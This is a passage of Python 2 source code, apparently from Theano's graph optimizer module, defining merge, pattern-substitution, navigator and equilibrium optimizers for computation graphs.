set(prof1[0]).intersection(set(prof2[0])): idx1 = prof1[0].index(l) idx2 = prof2[0].index(l) new_t.append(prof1[1][idx1] + prof2[1][idx2]) new_l.append(l) if hasattr(l, 'merge_profile'): assert len(prof1[5][idx1]) == len(prof2[5][idx1]) new_sub_profile.append(l.merge_profile(prof1[5][idx1], prof2[5][idx2])) else: new_sub_profile.append(None) # merge not common opt import StringIO for l in set(prof1[0]).symmetric_difference(set(prof2[0])): #The set trick above only work for the same object optimization #It don't work for equivalent optimization. #So we try to merge equivalent optimization here. new_l_names = [o.name for o in new_l] if l.name in new_l_names: idx = new_l_names.index(l.name) io1 = StringIO.StringIO() io2 = StringIO.StringIO() l.print_summary(io1) new_l[idx].print_summary(io2) if io1.read() == io2.read(): if l in prof1[0]: p = prof1 else: p = prof2 new_t[idx] += p[1][p[0].index(l)] if hasattr(l, 'merge_profile'): assert len(p[5][p[0].index(l)]) == len(new_sub_profile[idx]) new_sub_profile[idx] = l.merge_profile( new_sub_profile[idx], p[5][p[0].index(l)]) else: new_sub_profile[idx] = None continue if l in prof1[0]: p = prof1 else: p = prof2 new_t.append(p[1][p[0].index(l)]) idx = p[0].index(l) new_l.append(l) new_sub_profile.append(p[5][idx]) new_opt = SeqOptimizer(*new_l) assert set(prof1[0]).issubset(set(new_l)) # assert set(prof2[0]).issubset(set(new_l)) assert len(new_t) == len(new_opt) == len(new_sub_profile) return (new_opt, new_t, prof1[2] + prof2[2], -1, -1, new_sub_profile) class _metadict: """WRITEME""" # dict that accepts unhashable keys # uses an associative list # for internal use only def __init__(self): self.d = {} self.l = [] def __getitem__(self, item): return self.get(item, None) def __setitem__(self, item, value): try: self.d[item] = value except Exception: for i, (key, val) in enumerate(self.l): if key == item: self.l[i] = (item, value) return self.l.append((item, value)) def __delitem__(self, item): if item in self.d: del self.d[item] else: for i, (key, val) in enumerate(self.l): if key == item: del self.l[i] return raise KeyError(item) def discard(self, item): if item in self.d: del self.d[item] else: for i, (key, val) in enumerate(self.l): if key == item: del self.l[i] return def get(self, item, default): try: return self.d[item] except Exception: for item2, value in self.l: try: if item == item2: return value if item.equals(item2): return value except Exception: if item is item2: return value else: return default def clear(self): self.d = {} self.l = [] def __str__(self): return "(%s, %s)" % (self.d, self.l) class MergeFeature(object): """ Keeps track of variables in fgraph that cannot be merged together. That way, the MergeOptimizer can remember the result of the last merge pass on the fgraph. """ def on_attach(self, fgraph): assert not hasattr(fgraph, 'merge_feature') fgraph.merge_feature = self ## For constants self.seen_constants = set() # variable -> signature (for constants) self.const_sig = _metadict() # signature -> variable (for constants) self.const_sig_inv = _metadict() ## For all variables # Set of distinct (not mergeable) nodes self.nodes_seen = set() # Each element of scheduled is a list of list of (out, new_out) pairs. # Each list of pairs represent the substitution needed to replace all # the outputs of a node with the outputs of a replacement candidate. # Each node can have several candidates. For instance, if "node" has # 2 outputs, and there are 3 replacement candidates, we will have: # shelf.scheduled = [ # [[(node.out1, cand1.out1), (node.out2, cand1.out2)], # [(node.out1, cand2.out1), (node.out2, cand2.out2)], # [(node.out1, cand3.out1), (node.out2, cand3.out2)]]] self.scheduled = [] # List of (node, candidate) pairs, where we tried to replace node by # candidate, but it failed. This is used to avoid infinite loops # during the replacement phase. self.blacklist = [] for node in fgraph.toposort(): self.on_import(fgraph, node) def on_change_input(self, fgraph, node, i, r, new_r): # If inputs to node change, it is not guaranteed that it is distinct # from the other nodes in nodes_seen if node in self.nodes_seen: self.nodes_seen.discard(node) self.process_node(fgraph, node) if isinstance(new_r, graph.Constant): self.process_constant(fgraph, new_r) def on_import(self, fgraph, node): for c in node.inputs: if isinstance(c, graph.Constant): self.process_constant(fgraph, c) self.process_node(fgraph, node) def on_prune(self, fgraph, node): self.nodes_seen.discard(node) for c in node.inputs: if isinstance(c, graph.Constant) and (len(c.clients) <= 1): # This was the last node using this constant sig = self.const_sig[c] self.const_sig.discard(c) self.const_sig_inv.discard(sig) self.seen_constants.discard(id(c)) def process_constant(self, fgraph, c): """Check if a constant can be merged, and queue that replacement""" if id(c) in self.seen_constants: return sig = c.signature() other_c = self.const_sig_inv.get(sig, None) if other_c is not None: # multiple names will clobber each other.. # we adopt convention to keep the last name if c.name: other_c.name = c.name self.scheduled.append([[(c, other_c)]]) else: #this is a new constant self.const_sig[c] = sig self.const_sig_inv[sig] = c self.seen_constants.add(id(c)) def process_node(self, fgraph, node): """Check if a node can be merged, and queue that replacement.""" if node in self.nodes_seen: return # These asserts ensure that the fgraph has set the clients field properly. # The clients should at least contain `node` itself! if node.inputs: assert len(node.inputs[0].clients) > 0 assert (node, 0) in node.inputs[0].clients merge_candidates = [c for (c, i) in node.inputs[0].clients if c in self.nodes_seen] else: merge_candidates = [] replacement_candidates = [] for candidate in merge_candidates: if candidate is node: continue if len(node.inputs) != len(candidate.inputs): continue inputs_match = all(node_in is cand_in for node_in, cand_in in zip(node.inputs, candidate.inputs)) if inputs_match and node.op == candidate.op: if (node, candidate) in self.blacklist: # They were already tried, and there was an error continue # Schedule transfer of clients from node to candidate pairs = zip(node.outputs, candidate.outputs) #transfer names for node_output, cand_output in pairs: #clobber old name with new one #it's arbitrary... one of the names has to go if node_output.name: cand_output.name = node_output.name replacement_candidates.append(pairs) if replacement_candidates: self.scheduled.append(replacement_candidates) else: self.nodes_seen.add(node) class MergeOptimizer(Optimizer): """ Merges parts of the graph that are identical and redundant. The basic principle is that if two Applies have ops that compare equal, and identical inputs, then they do not both need to be computed. The clients of one are transferred to the other and one of them is removed from the graph. This procedure is carried out in input->output order through the graph. The first step of merging is constant-merging, so that all clients of an int(1) for example, are transferred to a particular instance of int(1). """ def add_requirements(self, fgraph): # Added by default #fgraph.attach_feature(toolbox.ReplaceValidate()) if not hasattr(fgraph, 'merge_feature'): fgraph.attach_feature(MergeFeature()) def apply(self, fgraph): # Constant and non-constant are now applied in the same phase. # I am not sure why, but it seems to be faster this way. sched = fgraph.merge_feature.scheduled while sched: pairs_list = sched.pop() success = True for pairs in pairs_list: try: fgraph.replace_all_validate(pairs, 'Merge') except InconsistencyError: success = False fgraph.merge_feature.blacklist.append( (pairs[0][0].owner, pairs[0][1].owner)) if success: break # clear blacklist fgraph.merge_feature.blacklist = [] merge_optimizer = MergeOptimizer() def is_same_graph_with_merge(var1, var2, givens=None): """ Merge-based implementation of `theano.gof.graph.is_same_graph`. See help on `theano.gof.graph.is_same_graph` for additional documentation. """ if givens is None: givens = {} # Copy variables since the MergeOptimizer will modify them. copied = copy.deepcopy([var1, var2, givens]) vars = copied[0:2] givens = copied[2] # Create FunctionGraph. inputs = theano.gof.graph.inputs(vars) fgraph = theano.gof.fg.FunctionGraph(inputs, vars) # Perform Variable substitution. for to_replace, replace_by in givens.iteritems(): fgraph.replace(to_replace, replace_by) # Perform merge optimization. merge_optimizer.optimize(fgraph) # When two variables perform the same computations, they will have the same # owner in the optimized graph. # We need to be careful with the special case where the owner is None, # which happens when the graph is made of a single Variable. # We also need to make sure we replace a Variable if it is present in # `givens`. vars_replaced = [givens.get(v, v) for v in vars] o1, o2 = [v.owner for v in vars_replaced] if o1 is None and o2 is None: # Comparing two single-Variable graphs: they are equal if they are # the same Variable. return vars_replaced[0] == vars_replaced[1] else: return o1 is o2 def MergeOptMerge(opt): """WRITEME Returns an Optimizer that merges the graph then applies the optimizer in opt and then merges the graph again in case the opt introduced additional similarities. """ merger = merge_optimizer opt = SeqOptimizer([merger, opt, merger]) opt.name = "MergeOptMerge" return opt def pre_constant_merge(vars): """ Merge constants in the subgraph used to compute nodes in `vars`. `vars` is a list of nodes, and we want to merge together nodes that are constant inputs used to compute nodes in that list. :note: This function will ignore nodes that are in an fgraph. It is used to pre-merge nodes generated inside an optimization, before it is inserted in the fgraph. It is useful if there are many such replacements to make, so that DebugMode will not check each of them. """ seen_var = set() # signature -> variable (for constants) const_sig_inv = {} def recursive_merge(var): if var in seen_var: return var if not hasattr(var, 'owner'): return var if var.owner and hasattr(var.owner, "fgraph"): return var seen_var.add(var) if isinstance(var, graph.Constant): sig = var.signature() if sig in const_sig_inv: return const_sig_inv[sig] const_sig_inv[sig] = var return var if var.owner: for idx, inp in enumerate(var.owner.inputs): var.owner.inputs[idx] = recursive_merge(inp) return var return map(recursive_merge, vars) ######################## ### Local Optimizers ### ######################## class LocalOptimizer(object): """A class for node-based optimizations. Instances should implement the transform function, and be passed to configure a fgraph-based Optimizer instance. """ def __hash__(self): if not hasattr(self, '_optimizer_idx'): self._optimizer_idx = _optimizer_idx[0] _optimizer_idx[0] += 1 return self._optimizer_idx def transform(self, node): """Transform a subgraph whose output is `node`. Subclasses should implement this function so that it returns one of two kinds of things: - False to indicate that no optimization can be applied to this `node`; or - <list of variables> to use in place of `node`'s outputs in the greater graph. :type node: an Apply instance """ raise utils.MethodNotDefined("transform", type(self), self.__class__.__name__) def add_requirements(self, fgraph): """ If this local optimization wants to add some requirements to the fgraph, This is the place to do it. """ # Added by default #fgraph.attach_feature(toolbox.ReplaceValidate()) pass def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s id=%i" % ( (' ' * level), self.__class__.__name__, id(self)) class FromFunctionLocalOptimizer(LocalOptimizer): """WRITEME""" def __init__(self, fn, tracks=None): if tracks is None: tracks = [] self.transform = fn self._tracks = tracks def tracks(self): return self._tracks def __str__(self): return getattr(self, '__name__', '<FromFunctionLocalOptimizer instance>') def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s id=%i" % ( ' ' * level, str(self.transform), id(self)) def local_optimizer(*tracks): def decorator(f): """WRITEME""" rval = FromFunctionLocalOptimizer(f, tracks) rval.__name__ = f.__name__ return rval return decorator class LocalOptGroup(LocalOptimizer): """WRITEME""" def __init__(self, *optimizers): self.opts = optimizers self.reentrant = any(getattr(opt, 'reentrant', True) for opt in optimizers) self.retains_inputs = all(getattr(opt, 'retains_inputs', False) for opt in optimizers) def __str__(self): return getattr(self, '__name__', ('<theano.gof.opt.LocalOptGroup instance>' + str([str(o) for o in self.opts]))) def transform(self, node): for opt in self.opts: repl = opt.transform(node) if repl: return repl def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s id=%i" % ( (' ' * level), self.__class__.__name__, id(self)) if depth != 0: depth -= 1 for lopt in self.opts: lopt.print_summary(stream, level=(level + 2), depth=depth) class _LocalOpKeyOptGroup(LocalOptGroup): """WRITEME""" def __init__(self, optimizers): if any(not hasattr(opt, 'op_key'), optimizers): raise TypeError("All LocalOptimizers passed here must have an op_key method.") CompositeLocalOptimizer.__init__(self, optimizers) def op_key(self): return [opt.op_key() for opt in self.opts] class OpSub(LocalOptimizer): """WRITEME Replaces the application of a certain op by the application of another op that take the same inputs as what they are replacing. e.g. OpSub(add, sub) ==> add(div(x, y), add(y, x)) -> sub(div(x, y), sub(y, x)) """ # an OpSub does not apply to the nodes it produces reentrant = False # all the inputs of the original node are transferred to the outputs retains_inputs = True def __init__(self, op1, op2, transfer_tags=True): """ op1.make_node and op2.make_node must take the same number of inputs and have the same number of outputs. """ self.op1 = op1 self.op2 = op2 self.transfer_tags = transfer_tags def op_key(self): return self.op1 def tracks(self): return [[self.op1]] def transform(self, node): if node.op != self.op1: return False repl = self.op2.make_node(*node.inputs) if self.transfer_tags: repl.tag = copy.copy(node.tag) for output, new_output in zip(node.outputs, repl.outputs): new_output.tag = copy.copy(output.tag) return repl.outputs def __str__(self): return "%s -> %s" % (self.op1, self.op2) class OpRemove(LocalOptimizer): """WRITEME Removes all applications of an op by transferring each of its outputs to the corresponding input. """ reentrant = False # no nodes are added at all def __init__(self, op): self.op = op def op_key(self): return self.op def tracks(self): return [[self.op]] def transform(self, node): if node.op != self.op: return False return node.inputs def __str__(self): return "%s(x) -> x" % (self.op) def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s(%s) id=%i" % ( ' ' * level, self.__class__.__name__, str(self.op), id(self)) class PatternSub(LocalOptimizer): """WRITEME @todo update Replaces all occurrences of the input pattern by the output pattern: input_pattern ::= (op, <sub_pattern1>, <sub_pattern2>, ...) input_pattern ::= dict(pattern = <input_pattern>, constraint = <constraint>) sub_pattern ::= input_pattern sub_pattern ::= string sub_pattern ::= a Constant instance sub_pattern ::= int sub_pattern ::= float constraint ::= lambda fgraph, expr: additional matching condition output_pattern ::= (op, <output_pattern1>, <output_pattern2>, ...) output_pattern ::= string output_pattern ::= int output_pattern ::= float Each string in the input pattern is a variable that will be set to whatever expression is found in its place. If the same string is used more than once, the same expression must be found in those places. If a string used in the input pattern is used in the output pattern, the matching expression will be inserted in its place. The input pattern cannot just be a string but the output pattern can. If you put a constant variable in the input pattern, there will be a match iff a constant variable with the same value and the same type is found in its place. You can add a constraint to the match by using the dict(...) form described above with a 'constraint' key. The constraint must be a function that takes the fgraph and the current Variable that we are trying to match and returns True or False according to an arbitrary criterion. Examples: PatternSub((add, 'x', 'y'), (add, 'y', 'x')) PatternSub((multiply, 'x', 'x'), (square, 'x')) PatternSub((subtract, (add, 'x', 'y'), 'y'), 'x') PatternSub((power, 'x', Constant(double, 2.0)), (square, 'x')) PatternSub((boggle, {'pattern': 'x', 'constraint': lambda expr: expr.type == scrabble}), (scrabble, 'x')) """ def __init__(self, in_pattern, out_pattern, allow_multiple_clients=False, skip_identities_fn=None, name=None, pdb=False): """ Creates a PatternSub that replaces occurrences of in_pattern by occurrences of out_pattern. :param in_pattern: the input pattern that we want to replace :param out_pattern: the replacement pattern :param allow_multiple_clients: if False, the pattern matching will fail if one of the subpatterns has more than one client. :param pdb: if True, we invoke pdb when the first node in the pattern match. """ self.in_pattern = in_pattern self.out_pattern = out_pattern if isinstance(in_pattern, (list, tuple)): self.op = self.in_pattern[0] elif isinstance(in_pattern, dict): self.op = self.in_pattern['pattern'][0] else: raise TypeError("The pattern to search for must start with " "a specific Op instance.") self.__doc__ = (self.__class__.__doc__ + "\n\nThis instance does: " + str(self) + "\n") self.allow_multiple_clients = allow_multiple_clients self.skip_identities_fn = skip_identities_fn if name: self.__name__ = name self.pdb = pdb def skip_identities(self, expr): if self.skip_identities_fn: return self.skip_identities_fn(expr) def op_key(self): return self.op def tracks(self): def helper(pattern, sofar): if isinstance(pattern, (list, tuple)): sofar = sofar + (pattern[0],) return reduce(tuple.__add__, tuple(helper(p, sofar) for p in pattern[1:]), ()) elif isinstance(pattern, dict): return helper(pattern['pattern'], sofar) else: return (sofar,) return set(helper(self.in_pattern, ())) def transform(self, node): """ Checks if the graph from node corresponds to in_pattern. If it does, constructs out_pattern and performs the replacement. """ if node.op != self.op: return False def match(pattern, expr, u, allow_multiple_clients=False, pdb=False): def retry_with_equiv(): expr_equiv = self.skip_identities(expr) if expr_equiv is None: return False #TODO: Not sure how to handle multiple_clients flag ###print 'retrying match', pattern, expr_equiv return match(pattern, expr_equiv, u, allow_multiple_clients=allow_multiple_clients) if isinstance(pattern, (list, tuple)): if expr.owner is None: return False if (not (expr.owner.op == pattern[0]) or (not allow_multiple_clients and len(expr.clients) > 1)): return retry_with_equiv() if len(pattern) - 1 != len(expr.owner.inputs): return retry_with_equiv() for p, v in zip(pattern[1:], expr.owner.inputs): u = match(p, v, u, self.allow_multiple_clients) if not u: return False elif isinstance(pattern, dict): try: real_pattern = pattern['pattern'] except KeyError: raise KeyError( "Malformed pattern: %s (expected key 'pattern')" % pattern) constraint = pattern.get('constraint', lambda expr: True) if constraint(expr): return match(real_pattern, expr, u, pattern.get('allow_multiple_clients', allow_multiple_clients)) else: return retry_with_equiv() elif isinstance(pattern, basestring): v = unify.Var(pattern) if u[v] is not v and u[v] is not expr: return retry_with_equiv() else: u = u.merge(expr, v) elif (isinstance(pattern, (int, float)) and isinstance(expr, graph.Constant)): if numpy.all( theano.tensor.constant(pattern).value == expr.value): return u else: return retry_with_equiv() elif (isinstance(pattern, graph.Constant) and isinstance(expr, graph.Constant) and pattern.equals(expr)): return u else: return retry_with_equiv() if pdb: import pdb pdb.set_trace() return u def build(pattern, u): if isinstance(pattern, (list, tuple)): args = [build(p, u) for p in pattern[1:]] return pattern[0](*args) elif isinstance(pattern, basestring): return u[unify.Var(pattern)] elif isinstance(pattern, (int, float)): return pattern else: return pattern.clone() u = match(self.in_pattern, node.out, unify.Unification(), True, self.pdb) if u: p = self.out_pattern new = build(p, u) ####print "PatternSub matched:", new return [new] else: return False def __str__(self): if getattr(self, '__name__', None): return self.__name__ def pattern_to_str(pattern): if isinstance(pattern, (list, tuple)): return "%s(%s)" % ( str(pattern[0]), ", ".join([pattern_to_str(p) for p in pattern[1:]])) elif isinstance(pattern, dict): return "%s subject to %s" % ( pattern_to_str(pattern['pattern']), str(pattern.get('constraint', 'no conditions'))) else: return str(pattern) return "%s -> %s" % ( pattern_to_str(self.in_pattern), pattern_to_str(self.out_pattern)) def __repr__(self): return str(self) def print_summary(self, stream=sys.stdout, level=0, depth=-1): name = getattr(self, '__name__', getattr(self, 'name', None)) print >> stream, "%s%s %s(%s, %s) id=%i" % ( ' ' * level, self.__class__.__name__, name, str(self.in_pattern), str(self.out_pattern), id(self)) ################## ### Navigators ### ################## # Use the following classes to apply LocalOptimizers class NavigatorOptimizer(Optimizer): """Abstract class """ @staticmethod def warn(exc, nav, repl_pairs, local_opt): """failure_callback for NavigatorOptimizer: print traceback """ _logger.error("Optimization failure due to: %s" % str(local_opt)) _logger.error("TRACEBACK:") _logger.error(traceback.format_exc()) if isinstance(exc, AssertionError) or config.on_opt_error == 'raise': raise exc @staticmethod def warn_inplace(exc, nav, repl_pairs, local_opt): """failure_callback for NavigatorOptimizer ignore InconsistencyErrors, print traceback """ if isinstance(exc, InconsistencyError): return return NavigatorOptimizer.warn(exc, nav, repl_pairs, local_opt) @staticmethod def warn_ignore(exc, nav, repl_pairs, local_opt): """failure_callback for NavigatorOptimizer: ignore all errors """ pass def __init__(self, local_opt, ignore_newtrees='auto', failure_callback=None): """ :param local_opt: a LocalOptimizer to apply over a FunctionGraph (or None is Ok too). :param ignore_newtrees: - True: new subgraphs returned by an optimization is not a candidate for optimization - False: new subgraphs returned by an optimization is a candidate for optimization - 'auto': let the local_opt set this parameter via its 'reentrant' attribute. :param failure_callback: a function that takes (exception, navigator, [(old, new), (old,new),...]) and we call it if there's an exception. If the trouble is from local_opt.transform(), the new variables will be 'None'. If the trouble is from validation (the new types don't match for example) then the new variables will be the ones created by transform(). If this parameter is None, then exceptions are not caught here (raised normally). """ self.local_opt = local_opt if ignore_newtrees == 'auto': self.ignore_newtrees = not getattr(local_opt, 'reentrant', True) else: self.ignore_newtrees = ignore_newtrees self.failure_callback = failure_callback def attach_updater(self, fgraph, importer, pruner, chin=None): """ Install some FunctionGraph listeners to help the navigator deal with the ignore_trees-related functionality. :param importer: function that will be called whenever when optimizations add stuff to the graph. :param pruner: function to be called when optimizations remove stuff from graph. :param chin: "on change input" called whenever an node's inputs change. :returns: The FunctionGraph plugin that handles the three tasks. Keep this around so that you can detach later! """ if self.ignore_newtrees: importer = None if importer is None and pruner is None: return None class Updater: if importer is not None: def on_import(self, fgraph, node): importer(node) if pruner is not None: def on_prune(self, fgraph, node): pruner(node) if chin is not None: def on_change_input(self, fgraph, node, i, r, new_r): chin(node, i, r, new_r) u = Updater() fgraph.attach_feature(u) return u def detach_updater(self, fgraph, u): """Undo the work of attach_updater. :param u: a return-value of attach_updater :returns: None. """ if u is not None: fgraph.remove_feature(u) def process_node(self, fgraph, node, lopt=None): """ This function will use `lopt` to `transform` the `node`. The `transform` method will return either False or a list of Variables that are intended to replace `node.outputs`. If the fgraph accepts the replacement, then the optimization is successful, and this function returns True. If there are no replacement candidates or the fgraph rejects the replacements, this function returns False. :param fgraph: a FunctionGraph :param node: an Apply instance in `fgraph` :param lopt: a LocalOptimizer instance that may have a better idea for how to compute node's outputs. :rtype: Bool :returns: True iff the `node`'s outputs were replaced in the `fgraph`. """ lopt = lopt or self.local_opt try: replacements = lopt.transform(node) except Exception, e: if self.failure_callback is not None: self.failure_callback(e, self, [(x, None) for x in node.outputs], lopt) return False else: raise if replacements is False or replacements is None: return False if not isinstance(replacements, (tuple, list)): raise TypeError('Optimizer %s gave wrong type of replacement. ' 'Expected list or tuple.' % lopt) if len(node.outputs) != len(replacements): raise ValueError('Optimizer %s gave wrong number of replacements' % lopt) # If an output would be replaced by itself, no need to perform # the replacement repl_pairs = [(r, rnew) for r, rnew in zip(node.outputs, replacements) if rnew is not r] if len(repl_pairs) == 0: return False try: fgraph.replace_all_validate(repl_pairs, reason=lopt) return True except Exception, e: # This means the replacements were rejected by the fgraph. # # This is not supposed to happen. The default failure_callback # will print a traceback as a warning. if self.failure_callback is not None: self.failure_callback(e, self, repl_pairs, lopt) return False else: raise def add_requirements(self, fgraph): super(NavigatorOptimizer, self).add_requirements(fgraph) # Added by default #fgraph.attach_feature(toolbox.ReplaceValidate()) if self.local_opt: self.local_opt.add_requirements(fgraph) def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s (%i)" % ( (' ' * level), self.__class__.__name__, id(self)) if depth != 0: self.local_opt.print_summary(stream, level=(level + 2), depth=(depth - 1)) class TopoOptimizer(NavigatorOptimizer): """WRITEME""" def __init__(self, local_opt, order='in_to_out', ignore_newtrees=False, failure_callback=None): if order not in ['out_to_in', 'in_to_out']: raise ValueError("order must be 'out_to_in' or 'in_to_out'") self.order = order NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees, failure_callback) def apply(self, fgraph, start_from=None): if start_from is None: start_from = fgraph.outputs q = deque(graph.io_toposort(fgraph.inputs, start_from)) def importer(node): if node is not current_node: q.append(node) def pruner(node): if node is not current_node: try: q.remove(node) except ValueError: pass u = self.attach_updater(fgraph, importer, pruner) try: while q: if self.order == 'out_to_in': node = q.pop() else: node = q.popleft() current_node = node self.process_node(fgraph, node) except Exception: self.detach_updater(fgraph, u) raise self.detach_updater(fgraph, u) class OpKeyOptimizer(NavigatorOptimizer): """WRITEME""" def __init__(self, local_opt, ignore_newtrees=False, failure_callback=None): if not hasattr(local_opt, 'op_key'): raise TypeError("LocalOptimizer for OpKeyOptimizer must have " "an 'op_key' method.") NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees, failure_callback) def apply(self, fgraph): op = self.local_opt.op_key() if isinstance(op, (list, tuple)): q = reduce(list.__iadd__, map(fgraph.get_nodes, op)) else: q = list(fgraph.get_nodes(op)) def importer(node): if node is not current_node: if node.op == op: q.append(node) def pruner(node): if node is not current_node and node.op == op: try: q.remove(node) except ValueError: pass u = self.attach_updater(fgraph, importer, pruner) try: while q: node = q.pop() current_node = node self.process_node(fgraph, node) except Exception: self.detach_updater(fgraph, u) raise self.detach_updater(fgraph, u) def add_requirements(self, fgraph): """ Requires the following features: - NodeFinder - ReplaceValidate(Added by default) """ super(OpKeyOptimizer, self).add_requirements(fgraph) fgraph.attach_feature(toolbox.NodeFinder()) class ChangeTracker: def __init__(self): self.changed = False def on_import(self, fgraph, node): self.changed = True def on_change_input(self, fgraph, node, i, r, new_r): self.changed = True def reset(self): self.changed = False def on_attach(self, fgraph): fgraph.change_tracker = self class EquilibriumOptimizer(NavigatorOptimizer): def __init__(self, optimizers, failure_callback=None, max_depth=None, max_use_ratio=None): """ :param optimizers: list or set of local or global optimizations to apply until equilibrium. :param max_use_ratio: each optimizer can be applied at most (size of graph * this number) times :param max_depth: TODO what does this do? (EquilibriumDB sets it to 5) """ super(EquilibriumOptimizer, self).__init__( None, ignore_newtrees=True, failure_callback=failure_callback) self.local_optimizers = [] self.global_optimizers = [] for opt in optimizers: if isinstance(opt, LocalOptimizer): self.local_optimizers.append(opt) else: self.global_optimizers.append(opt) self.max_depth = max_depth self.max_use_ratio = max_use_ratio assert self.max_use_ratio is not None, ( 'max_use_ratio has to be a number') def add_requirements(self, fgraph): super(EquilibriumOptimizer, self).add_requirements(fgraph) fgraph.attach_feature(ChangeTracker()) for opt in self.local_optimizers: opt.add_requirements(fgraph) for opt in self.global_optimizers: opt.add_requirements(fgraph) def apply(self, fgraph, start_from=None): if start_from is None: start_from = fgraph.outputs changed = True max_use_abort = False opt_name = None process_count = {} max_nb_nodes = 0 loop_timing = [] global_opt_timing = [] time_lopts = {} io_toposort_timing = [] nb_nodes = [] for lopt in self.local_optimizers: process_count.setdefault(lopt, 0) time_lopts.setdefault(lopt, 0) while changed and not max_use_abort: t0 = time.time() changed = False #apply global optimizer fgraph.change_tracker.reset() for gopt in self.global_optimizers: gopt.apply(fgraph) if fgraph.change_tracker.changed: changed = True global_opt_timing.append(float(time.time() - t0)) #apply local optimizer for node in start_from: assert node in fgraph.outputs topo_t0 = time.time() q = deque(graph.io_toposort(fgraph.inputs, start_from)) io_toposort_timing.append(time.time() - topo_t0) nb_nodes.append(len(q)) max_nb_nodes = max(max_nb_nodes, len(q)) max_use = max_nb_nodes * self.max_use_ratio def importer(node): if node is not current_node: q.append(node) def pruner(node): if node is not current_node: try: q.remove(node) except ValueError: pass u = self.attach_updater(fgraph, importer, pruner) try: while q: node = q.pop() current_node = node for lopt in self.local_optimizers: t_lopt = time.time() lopt_change = self.process_node(fgraph, node, lopt) time_lopts[lopt] += time.time() - t_lopt if lopt_change: process_count[lopt] += 1 changed = True if process_count[lopt] > max_use: max_use_abort = True opt_name = (getattr(lopt, "name", None) or getattr(lopt, "__name__", "")) if node not in fgraph.apply_nodes: # go to next node break finally: self.detach_updater(fgraph, u) loop_timing.append(float(time.time() - t0)) if max_use_abort: _logger.error("EquilibriumOptimizer max'ed out by '%s'" % opt_name + ". You can safely raise the current threshold of " + "%f with the theano flag 'optdb.max_use_ratio'." % config.optdb.max_use_ratio) if config.time_eq_optimizer: print "EquilibriumOptimizer", print getattr(self, "name", getattr(self, "__name__", "")) print " time %.3fs for %d passes, %d nodes max" % ( sum(loop_timing), len(loop_timing), max_nb_nodes) for i in range(len(loop_timing)): print '%d - %.3fs (%.3fs in global opts) - %d nodes' % ( i, loop_timing[i], global_opt_timing[i], nb_nodes[i]) print count_opt = [] for opt, count in process_count.iteritems(): if count > 0: count_opt.append((count, opt)) if count_opt: print 'times applied - optimizer:' count_opt.sort() for (count, opt) in count_opt[::-1]: print ' %d - %s' % (count, opt) print return (self, loop_timing, process_count, max_nb_nodes, global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) def print_summary(self, stream=sys.stdout, level=0, depth=-1): name = getattr(self, 'name', None) print >> stream, "%s%s %s id=%i" % ( (' ' * level), self.__class__.__name__, name, id(self)) if depth != 0: for lopt in self.local_optimizers: lopt.print_summary(stream, level=(level + 2), depth=(depth - 1)) @staticmethod def print_profile(stream, prof, level=0): (opt, loop_timing, process_count, max_nb_nodes, global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof blanc = (' ' * level) print >> stream, blanc, "EquilibriumOptimizer", print >> stream, blanc, getattr(opt, "name", getattr(opt, "__name__", "")) print >> stream, blanc, " time %.3fs for %d passes, %d nodes max" % ( sum(loop_timing), len(loop_timing), max_nb_nodes) print >> stream, blanc, " time io_toposort %.3fs" % sum( io_toposort_timing) for i in range(len(loop_timing)): print >> stream, blanc, ('%d - %.3fs (%.3fs in global opts, ' '%.3fs io_toposort) - %d nodes' % ( i, loop_timing[i], global_opt_timing[i], io_toposort_timing[i], nb_nodes[i])) count_opt = [] for opt, count in process_count.iteritems(): if count > 0: count_opt.append((time_lopts[opt], count, opt)) if count_opt: print >> stream, blanc, 'times applied - optimizer (only those applied):' count_opt.sort() for (t, count, opt) in count_opt[::-1]: print >> stream, blanc, ' %.3fs - %d - %s' % ( t, count, opt) print >> stream @staticmethod def merge_profile(prof1, prof2): #(opt, loop_timing, process_count, max_nb_nodes, # global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof1 local_optimizers = set(prof1[0].local_optimizers).union( prof2[0].local_optimizers) global_optimizers = set(prof1[0].global_optimizers).union( prof2[0].global_optimizers) new_opt = EquilibriumOptimizer( local_optimizers.union(global_optimizers), max_use_ratio=1) def merge_list(l1, l2): l = copy.copy(l1) for idx, nb in enumerate(l2): if idx < len(l): l[idx] += nb else: l.append(nb) return l loop_timing = merge_list(prof1[1], prof2[1]) process_count = prof1[2].copy() for process, count in prof2[2].iteritems(): if process in process_count: process_count[process] += count else: process_count[process] = count max_nb_nodes = max(prof1[3], prof2[3]) global_opt_timing = merge_list(prof1[4], prof2[4]) nb_nodes = merge_list(prof1[5], prof2[5]) time_lopts = prof1[6].copy() for opt, t in prof2[6].iteritems(): if opt in time_lopts: time_lopts[opt] += t else: time_lopts[opt] = t io_toposort_timing = merge_list(prof1[7], prof2[7]) assert (len(loop_timing) == len(global_opt_timing) == len(io_toposort_timing) == len(nb_nodes)) assert len(loop_timing) == max(len(prof1[1]), len(prof2[1])) return (new_opt, loop_timing, process_count, max_nb_nodes, global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) ################# ### Utilities ### ################# def _check_chain(r, chain): """WRITEME""" chain = list(reversed(chain)) while chain: elem = chain.pop() if elem is None: if not r.owner is None: return False elif r.owner is None: return False elif isinstance(elem, op.Op): if not r.owner.op == elem: return False else: try: if (issubclass(elem, op.Op) and not isinstance(r.owner.op, elem)): return False except TypeError: return False if chain: r = r.owner.inputs[chain.pop()] #print 'check_chain', _check_chain.n_calls #_check_chain.n_calls += 1 # The return value will be used as a Boolean, but some Variables cannot # be used as Booleans (the results of comparisons, for instance) return (r is not None) #_check_chain.n_calls = 0 def check_chain(r, *chain): """WRITEME""" if isinstance(r, graph.Apply): r = r.outputs[0] return _check_chain(r, reduce(list.__iadd__, ([x, 0] for x in chain))) def pre_greedy_local_optimizer(list_optimizations, out): ''' This function traverses the computation graph described by all ``node`` in the graph before the variable out but that are not in the fgraph. it applies each of the local_optimizations on the traversed graph. Its main use is to apply locally constant folding when generating the graph of the indices of a 